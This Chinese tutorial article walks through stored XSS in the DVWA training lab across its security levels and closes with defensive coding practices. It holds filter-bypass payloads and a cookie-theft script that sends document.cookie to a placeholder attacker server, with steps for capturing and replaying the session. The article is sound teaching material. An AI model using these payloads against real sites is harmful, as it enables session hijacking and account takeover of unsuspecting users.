当前位置：首页 > news >正文

存储型XSS漏洞实战解析：从DVWA靶场到安全防御

news 2026/6/20 6:49:16

1. 项目概述：从靶场实战理解存储型XSS的持久威胁

在Web安全的学习与渗透测试实践中，DVWA（Damn Vulnerable Web Application）是一个绕不开的经典靶场。它像一个精心设计的“漏洞博物馆”，将各种常见的Web漏洞，如SQL注入、文件上传、命令执行等，以可控、可复现的方式呈现出来。今天我们要深入探讨的，是其中一种极具代表性的客户端漏洞——存储型跨站脚本攻击。不同于反射型XSS的一次性“闪现”，存储型XSS更像是在服务器端埋下了一颗“地雷”，任何触发它的用户都可能中招，其危害性和隐蔽性都更高。通过DVWA这个平台，我们不仅能直观地看到攻击是如何发生的，更能一步步拆解其背后的原理、利用手法，并最终理解如何从防御者的角度去加固应用。这篇文章，我将结合自己多年的渗透测试和代码审计经验，带你从攻击者的视角出发，彻底搞懂存储型XSS，并分享一些在真实环境中排查和利用这类漏洞的实战心得。

2. 存储型XSS核心原理与DVWA环境解析

2.1 什么是存储型XSS？它与反射型、DOM型的本质区别

跨站脚本攻击的核心，简而言之，就是攻击者能够将恶意脚本代码“注入”到目标网页中，并被其他用户的浏览器执行。根据恶意代码的存储和触发位置，XSS主要分为三类：反射型、存储型和DOM型。

反射型XSS是最常见也最“直白”的一种。攻击者构造一个包含恶意脚本的链接，诱骗用户点击。服务器接收到这个恶意请求后，未加过滤地将恶意脚本“反射”回用户的浏览器页面中执行。整个过程，恶意代码并不存储在服务器上，而是“一次性”地通过URL参数传递。你可以把它想象成“钓鱼邮件”里的一个恶意链接，点了就中招，但链接本身是临时的。

DOM型XSS则更“前端”一些。漏洞的根源在于前端JavaScript代码对用户可控的数据（如URL的hash片段、document.referrer等）处理不当。恶意脚本的组装和执行完全发生在客户端的浏览器中，不经过服务器端处理（或者服务器返回的是安全的数据，但客户端脚本将其不安全地拼接成了HTML）。它的攻击链也通常通过恶意链接传播。

而存储型XSS，才是我们今天的主角，也是危害最大的一种。攻击者将恶意脚本代码提交到目标网站的后端服务器（例如，写入数据库、评论系统、用户资料、文章内容等），并被永久或半永久地存储起来。之后，任何访问到包含这段恶意代码页面的普通用户，其浏览器都会自动执行该脚本。这就好比攻击者在网站的公告板或留言簿上涂写了一串危险的咒语，之后每一个来看公告板的人都会自动中咒。它的危害是持久且广泛的，可能造成大规模的用户Cookie窃取、会话劫持、网页挂马、甚至结合其他漏洞进一步渗透内网。

在DVWA靶场中，“XSS (Stored)”模块完美模拟了一个存在存储型XSS漏洞的留言板功能，为我们提供了绝佳的实验环境。

2.2 DVWA靶场搭建与安全等级设置要点

工欲善其事，必先利其器。虽然网络上有很多在线DVWA环境，但我强烈建议你在本地或可控的虚拟机中搭建一套。这不仅能让你更自由地进行破坏性测试（反正弄坏了自己重建），还能深入查看后端PHP代码，理解漏洞产生的根源。

常见的搭建方式是使用集成了Apache、MySQL、PHP的套件，如XAMPP、PHPStudy，然后将DVWA的源码包解压到其Web目录（如htdocs）下。随后，根据config/config.inc.php.dist文件的提示，复制一份并重命名为config.inc.php，修改其中的数据库连接信息。首次通过浏览器访问DVWA时，页面会引导你创建数据库。

这里有一个非常重要的实操心得：DVWA设计了四个安全等级（Security Level）：Low, Medium, High, Impossible。这个设计极其精妙，它模拟了开发者在不同安全意识下编写的代码。

Low：完全不设防。源代码中几乎没有做任何过滤和校验，直观展示了漏洞最原始的样子。这是我们分析原理和练习基础Payload的起点。
Medium：尝试进行一些防御，但方法不完善或存在缺陷。例如，可能使用了简单的字符串替换（如把<script>替换成空），但我们可以通过大小写混淆、双写、使用其他标签等方式绕过。这个等级最能锻炼我们的绕过技巧和思维。
High：采用了相对严格的过滤机制，例如使用更完善的正则表达式或HTML实体编码。绕过难度大增，需要更精巧的Payload或利用更罕见的浏览器特性。
Impossible：展示了当前公认的最佳实践防御方案，通常结合了白名单过滤、严格的上下文输出编码（如使用htmlspecialchars函数并设置正确的参数）等。这个等级的代码是我们学习如何安全编程的范本。

注意：在开始任何测试前，务必在DVWA首页将安全等级设置为“Low”。很多新手会忽略这一步，导致输入Payload后没有任何反应，误以为靶场有问题，其实是防御机制生效了。

3. Low安全等级下的漏洞利用全流程拆解

将DVWA安全等级设置为Low后，我们进入“XSS (Stored)”模块。你会看到一个简单的留言板界面，包含“Name”和“Message”两个输入框，以及一个提交按钮。下方会显示历史留言。

3.1 基础Payload构造与注入

在Low等级下，服务器端对用户输入没有任何过滤，我们的攻击可以“为所欲为”。最经典的测试Payload是：

<script>alert('XSS')</script>

我们将其填入“Message”输入框（“Name”框也可以，原理相同），然后点击“Sign Guestbook”。

发生了什么？

你的浏览器将表单数据（Name和Message）提交给服务器。
服务器端（vulnerabilities/xss_s/source/low.php）的PHP代码直接接收了这些参数，并将其插入到用于存储留言的SQL语句中，保存到数据库。
当任何用户（包括你自己）再次访问这个留言板页面时，服务器会从数据库中取出所有留言，并直接将其作为HTML代码的一部分，输出到网页中。
你的浏览器在渲染页面时，遇到了<script>alert('XSS')</script>这段代码，它将其识别为合法的JavaScript脚本标签并立即执行，于是弹出了一个警告框。

这个过程清晰地展示了存储型XSS的攻击链：输入 -> 存储 -> 输出 -> 执行。漏洞产生的关键点在于第3步：服务器将用户可控的、未经验证和净化的数据，直接当作HTML代码输出到了响应页面中。

3.2 攻击场景深化：窃取用户Cookie实战

弹个警告框只是“友好”的证明漏洞存在。在真实的攻击中，攻击者的目的是窃取敏感信息或执行恶意操作。最常见的目标就是用户的会话Cookie。

HTTP协议本身是无状态的，Cookie是服务器用来识别用户身份的关键凭证。窃取了Cookie，攻击者往往就能在不知道密码的情况下，直接以受害者的身份登录系统。

我们来构造一个能够窃取Cookie的Payload：

<script>new Image().src='http://你的接收服务器/steal.php?cookie='+document.cookie;</script>

Payload解析：

new Image()：创建一个隐形的<img>标签。这种方式可以发起一个GET请求，且不会像window.location那样跳转页面，隐蔽性更强。
.src='http://...'：将图片的源设置为一个攻击者控制的服务器地址，并将document.cookie作为URL参数附加上去。
document.cookie：JavaScript中获取当前页面所有Cookie的API。

你需要做的准备工作：

准备一个接收服务器：你可以在本地用Python快速搭建一个简易的HTTP服务器来接收数据。
```
# 在终端中执行，监听8080端口 python3 -m http.server 8080
```
修改Payload：将上述Payload中的http://你的接收服务器/steal.php替换为你的服务器地址，例如http://192.168.1.100:8080/。注意，如果DVWA靶场运行在虚拟机或容器内，需要确保网络能互通。
注入并观察：将构造好的Payload作为留言提交。然后，换一个浏览器（或清空当前浏览器Cookie后）访问该留言板页面。此时，受害者浏览器会执行脚本，向你的服务器发送携带其Cookie的请求。

在你的Python服务器终端，你将会看到类似这样的访问日志：

192.168.1.xxx - - [日期时间] "GET /?cookie=PHPSESSID=abc123def456...; security=low HTTP/1.1" 200 -

恭喜，你已经成功“窃取”到了受害者的Cookie（特别是PHPSESSID）。攻击者拿到这个Cookie后，可以通过浏览器的开发者工具（Application -> Cookies）将其编辑到自己的浏览器中，刷新页面，即可直接以受害者身份登录系统。

重要注意事项：在实际渗透测试或安全研究中，绝对禁止在未经授权的真实网站上进行此类测试。这不仅是违法行为，还可能对业务造成严重损害。我们的所有操作必须在像DVWA这样的授权靶场或自己搭建的测试环境中进行。

4. Medium与High安全等级的绕过技巧探究

将DVWA安全等级调至Medium，再次尝试注入基础的<script>标签，你会发现攻击失败了。页面没有弹窗，留言内容也被修改了。我们查看后端代码（medium.php）一探究竟。

4.1 Medium等级：不完善的过滤与绕过

Medium等级的核心防御代码通常是对<script>标签进行了简单的字符串替换或删除：

$message = str_replace( '<script>', '', $message );

这种防御非常脆弱，有至少三种经典的绕过方式：

大小写绕过：<script>标签对大小写不敏感，但str_replace是敏感的。
```
<ScRiPt>alert('XSS')</ScRiPt>
```
双写绕过：因为替换是删除匹配的字符串，我们可以构造Payload，使得删除一部分后，剩下的部分又能组合成目标标签。
```
<scr<script>ipt>alert('XSS')</script>
```
服务器处理时，会删除中间的<script>，剩下的字符拼接起来正好是<script>alert('XSS')</script>。
使用非<script>标签：XSS不一定非要依赖<script>标签。很多HTML标签的属性支持javascript:伪协议或事件处理器。
- 利用<img>标签的onerror事件：
```
<img src=x onerror=alert('XSS')>
```
  浏览器尝试加载一个不存在的图片x，触发onerror事件，执行其中的JavaScript代码。
- 利用<body>标签的onload事件（如果可控）：
```
<body onload=alert('XSS')>
```
- 利用<svg>等HTML5标签：
```
<svg/onload=alert('XSS')>
```

在DVWA的Medium等级下，通常使用<img>标签的Payload就能成功绕过。这告诉我们，简单的黑名单过滤（列出坏东西并删除）是远远不够的，总有漏网之鱼。

4.2 High等级：严格过滤与终极绕过思路

将等级调至High，你会发现无论是<script>还是<img>标签，Payload都被无情地过滤或编码了。查看high.php源码，其防御可能采用了更强大的方式，例如：

使用preg_replace进行正则表达式匹配和删除，模式可能覆盖了多种变体。
在输出时，对输入内容进行了HTML实体编码。例如，将<转换为<，将>转换为>，这样浏览器就会将其显示为普通文本，而不会解析为HTML标签。

在High等级下，常规的标签注入几乎失效。这时，我们需要转换思路。存储型XSS的利用场景不一定只在当前页面。有时，我们可以寻找二次注入或组合漏洞的机会。

例如，考虑这样一个场景：留言内容虽然被严格过滤，但留言者的“Name”字段可能在其他页面（如管理员后台的审核列表）以不同的方式输出，且那里的过滤可能较弱。或者，应用程序可能允许用户上传头像，并在显示头像时未对图片路径进行过滤，导致可以注入onerror事件。

对于DVWA High等级，一种可能的绕过思路是利用HTML标签的属性本身并不总是需要引号或尖括号闭合的特性，但这需要前端的HTML解析器非常“宽容”。更实际的教训是：防御必须覆盖所有用户可控数据的输出点，并且要根据数据即将被放置的上下文（HTML正文、HTML属性、JavaScript代码、CSS、URL等）采取相应的编码或过滤策略。这也是Impossible等级所展示的“白名单+上下文相关编码”成为最佳实践的原因。

5. 从攻击到防御：安全开发最佳实践

通过攻击，我们理解了漏洞。而作为一名安全从业者或开发者，更重要的是知道如何构建防御。

5.1 根本原因与安全编码原则

存储型XSS产生的根本原因是：将不可信的数据与HTML文档结构混合在一起，且未进行正确的转义（编码）。

防御的核心原则是：“一切输入都是有害的”以及“在正确的上下文中对输出进行编码”。

输入验证（Input Validation）：在数据进入应用程序时进行验证。优先采用白名单策略，即只允许符合预期格式的数据通过（例如，姓名只允许字母和空格，长度限制）。这能过滤掉大量畸形数据。但请注意，输入验证不能替代输出编码，因为它无法预知数据未来会被用在哪个上下文中。
输出编码（Output Encoding）：这是防御XSS最有效、最根本的手段。在将数据输出到页面时，根据其所在的上下文，对其进行编码。
- HTML正文上下文：使用HTML实体编码。将&,<,>,",'等特殊字符转换为对应的实体（如&,<,>,",'）。在PHP中，使用htmlspecialchars($string, ENT_QUOTES, 'UTF-8')。ENT_QUOTES参数非常重要，它会同时编码单双引号，防止属性逃逸。
- HTML属性上下文：同样使用HTML实体编码。确保属性值总是用引号括起来（单引号或双引号）。
- JavaScript上下文：将数据放入JavaScript变量或脚本中时，需要进行JavaScript Unicode转义。
- URL上下文：在将数据作为URL的一部分输出时，进行URL编码（urlencode）。
使用安全的框架和库：现代Web开发框架（如React, Vue, Angular）及模板引擎（如Jinja2, Thymeleaf）通常默认提供了上下文感知的自动转义功能，能极大降低XSS风险。但开发者仍需了解其原理，避免使用v-html或dangerouslySetInnerHTML等危险API。
内容安全策略（Content Security Policy, CSP）：这是一个重要的深度防御措施。CSP通过HTTP头告诉浏览器，哪些来源的资源（脚本、样式、图片等）是可信的，可以执行或加载。即使攻击者成功注入了脚本，如果该脚本的来源不在白名单内，浏览器也会拒绝执行。例如，一个严格的CSP头可以设置为只允许加载同源的脚本：Content-Security-Policy: default-src 'self'; script-src 'self';。

5.2 DVWA Impossible等级代码赏析

让我们看看DVWA中Impossible等级的解决方案（impossible.php）：

// 检查Anti-CSRF Token，防止CSRF攻击提交恶意留言 checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' ); // 获取输入，并使用`htmlspecialchars`在输入时立即进行编码（这是一种策略，更常见的做法是在输出时编码） $name = htmlspecialchars( $_POST[ 'txtName' ] ); $message = htmlspecialchars( $_POST[ 'mtxMessage' ] ); // 使用预处理语句（Prepared Statements）防止SQL注入 $data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' ); $data->bindParam( ':message', $message, PDO::PARAM_STR ); $data->bindParam( ':name', $name, PDO::PARAM_STR ); $data->execute();

这段代码做了几件关键事情：

Anti-CSRF Token：防止攻击者通过伪造请求（CSRF）来提交XSS Payload，增加了攻击难度。
输出编码：在将用户输入存入数据库之前，就使用htmlspecialchars($var, ENT_QUOTES, 'UTF-8')进行了HTML实体编码。这意味着从数据库中取出的数据已经是编码后的安全文本，在任何HTML上下文中输出都不会被解析为代码。这是一种“存储已编码数据”的策略。另一种同等有效的策略是存储原始数据，在每一次输出到前端时进行编码。
SQL注入防护：使用PDO预处理语句，彻底杜绝了SQL注入的可能。这提醒我们，一个功能点可能同时存在多种漏洞，防御需要全面。

6. 实战排查与高级利用思路

在实际的渗透测试或代码审计中，如何系统地发现和利用存储型XSS呢？

6.1 漏洞挖掘方法论

寻找数据输入与持久化点：关注所有允许用户提交数据并能被再次展示的功能点。如：用户资料（昵称、签名、头像URL）、文章/评论/留言、站内信、订单备注、文件上传名称、搜索关键词（有时会被显示在结果页“您搜索的是XXX”）等。
测试输入过滤：尝试输入一些基本的XSS测试向量，如<script>alert(1)</script>，”><img src=x onerror=alert(1)>，观察响应。
- 如果被原样显示并弹窗，说明存在漏洞。
- 如果标签被删除或编码（显示为<script>），则尝试上述的绕过技巧。
- 使用专业的模糊测试工具或Burp Suite的Intruder模块，加载XSS Payload字典进行自动化测试。
追踪数据流：确认输入的数据被存储后，在哪些页面、以何种形式（HTML、JSON、XML）输出。有时数据可能在后台管理界面、邮件通知、移动端API等非主流页面输出，且过滤可能更弱。
审查输出上下文：使用浏览器开发者工具，查看你提交的数据最终被放置在HTML文档的哪个位置。是在<div>标签内（HTML正文）？还是在<input value=”…”>的属性里？抑或是被放在了<script>var data = “…”;</script>的JavaScript字符串中？不同的上下文需要不同的Payload和编码方式。

6.2 高级利用场景：Beyond Alert Box

窃取Cookie是最直接的目标，但存储型XSS的利用远不止于此：

会话劫持与账户接管：如前所述，利用窃取的Cookie直接登录用户账户。
键盘记录与表单劫持：注入的脚本可以监听页面的onkeypress事件，记录用户的每一次击键，从而获取密码、信用卡号等敏感信息。也可以重写表单的onsubmit事件，将数据发送到攻击者服务器。
网络钓鱼：利用XSS在可信的网站内部伪造一个登录弹窗或页面，诱使用户输入凭证。
结合CSRF发起内部攻击：如果网站存在CSRF漏洞，XSS脚本可以自动发起一个修改用户邮箱、密码或进行转账的CSRF请求，因为请求会携带用户的合法Cookie。
传播蠕虫：在社交网站或邮件系统中，XSS Payload可以构造一段代码，让受害者在访问页面后，自动以其身份向好友发送包含同样恶意代码的消息，从而实现自我传播。
盗取浏览器存储的密码：虽然现代浏览器对此防护严格，但历史漏洞或配合其他攻击可能实现。
进行客户端挖矿（Cryptojacking）：在用户浏览器中注入挖矿脚本，消耗其计算资源。

6.3 常见问题与排查技巧实录

在利用DVWA或实际测试中，你可能会遇到以下问题：

问题1：Payload提交后，页面没有弹窗，也没有任何反应。

排查：
- 首先检查DVWA的安全等级是否设置为Low。
- 打开浏览器开发者工具（F12）的“控制台（Console）”标签页，查看是否有JavaScript错误。可能是Payload语法错误，或者网站有CSP策略阻止了脚本执行。
- 查看“元素（Elements）”标签页，搜索你提交的Payload，看它是否被正确插入到HTML中，还是被编码或截断了。
- 如果被编码（显示为<），说明存在输出编码。尝试寻找未编码的输出点或使用其他上下文（如属性）的Payload。

问题2：Cookie窃取Payload执行了，但接收服务器没收到请求。

排查：
- 检查网络连通性。确保DVWA靶场所在环境能访问到你的接收服务器IP和端口。
- 检查接收服务器是否在正常运行（python3 -m http.server 8080命令是否持续运行）。
- 检查浏览器控制台是否有关于跨域请求（CORS）的错误。简单的Image.src请求通常不受同源策略限制，但复杂的请求可能会。
- 尝试使用更简单的Payload测试网络，如<script>fetch(‘http://你的服务器/ping’)</script>。

问题3：在真实复杂应用中，如何判断XSS是否可利用？

技巧：
- 使用盲打平台：如Burp Suite的Collaborator Client或公开的RequestBin服务。Payload会向一个你控制的、唯一的域名发起请求。如果该域名收到请求，则证明脚本已执行，即使你看不到前端效果（盲XSS）。这对于测试那些仅在后台或特定用户（如管理员）界面输出的数据非常有效。
- 延时判断：使用setTimeout或setInterval函数构造延时触发的Payload，观察效果。
- 分步测试：先测试最基本的HTML标签注入（如<h1>test</h1>），看样式是否改变；再测试简单的事件（如<svg onload=alert(1)>）；最后测试外部资源加载。

通过DVWA这个微观世界，我们系统地演练了存储型XSS从发现、利用到防御的全过程。记住，安全是一个持续的过程，而非一劳永逸的状态。对于开发者，应将安全编码原则内化为习惯；对于安全人员，则应保持攻击者的思维，以发现潜在的风险。在Low等级下长驱直入，在Medium等级下斗智斗勇，在High等级下绞尽脑汁，最终在Impossible等级的代码中学习如何筑起坚固的城墙，这正是DVWA带给我们的宝贵财富。

查看全文

http://www.jsqmd.com/news/1046901/